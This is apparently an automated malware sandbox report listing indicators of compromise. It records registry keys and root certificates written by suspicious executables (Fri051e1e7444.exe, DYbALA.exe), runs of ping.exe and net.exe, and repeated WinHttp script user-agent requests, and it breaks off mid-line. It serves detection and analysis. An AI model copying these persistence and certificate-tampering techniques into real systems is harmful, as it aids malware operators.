(int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\ = "120" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "785" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mx.gearbest.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 077c408333c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "626" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.gearbest.com\ = "339" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 28be969231c7d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "754" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "309" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658B = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\it.gearbest.com\ = "338" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "9" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d385ccd632c7d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\it.gearbest.com\ = "238" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "349" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mugrikees.com\Total = "111" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD DYbALA.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f DYbALA.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4888 PING.EXE 2904 PING.EXE -
Script User-Agent 64 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 413 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 551 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 985 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1300 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1934 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1277 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1721 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1733 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1784 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1799 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 895 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 956 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1269 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1754 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2062 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 869 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1011 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1117 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2408 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 708 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1817 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1876 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2379 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1365 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1967 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2267 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2321 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1684 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2126 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2307 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 615 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 980 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1032 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2411 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 894 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 994 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1898 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2068 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 495 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2090 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 891 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1437 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1631 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1512 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1001 Mozilla/4.0 (compatible; Win32; 